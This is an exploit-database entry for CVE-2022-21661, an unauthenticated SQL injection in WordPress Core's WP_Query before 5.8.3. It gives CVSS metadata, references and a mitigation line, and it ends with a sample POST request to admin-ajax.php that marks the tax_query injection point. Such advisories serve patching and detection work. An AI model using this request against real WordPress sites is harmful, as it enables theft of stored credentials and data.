WordPress Core 5.8.2 - 'WP_Query' SQL Injection

vendor:

WordPress Core

by:

Aryan Chehreghani

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: WordPress Core

Affected Version From: < 5.8.3

Affected Version To: < 5.8.3

Patch Exists: YES

Related CWE: CVE-2022-21661

CPE: a:wordpress:wordpress

Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-21661/

Other Scripts:

Tags: wp,sqli,wpquery,wpscan,packetstorm,cve,cve2022,wordpress

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nuclei References: https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317, https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection, http://packetstormsecurity.com/files/165540/WordPress-Core-5.8.2-SQL-Injection.html, https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84, https://nvd.nist.gov/vuln/detail/cve-2022-21661

Nuclei Metadata: {'max-request': 1, 'verified': True, 'vendor': 'wordpress', 'product': 'wordpress'}

Platforms Tested: Windows 10

2022

WordPress Core 5.8.2 – ‘WP_Query’ SQL Injection

This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core. Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

Mitigation:

Ensure that user-supplied strings are properly validated before using them to construct SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
# Date: 11/01/2022
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/download/releases
# Version: < 5.8.3
# Tested on: Windows 10
# CVE : CVE-2022-21661

# [ VULNERABILITY DETAILS ] : 

#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,
#Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class,
#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,
#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

# [ References ] : 

https://wordpress.org/news/category/releases
https://www.zerodayinitiative.com/advisories/ZDI-22-020
https://hackerone.com/reports/1378209

# [ Sample Request ] :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close 
Content-Type: application/x-www-form-urlencoded

action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}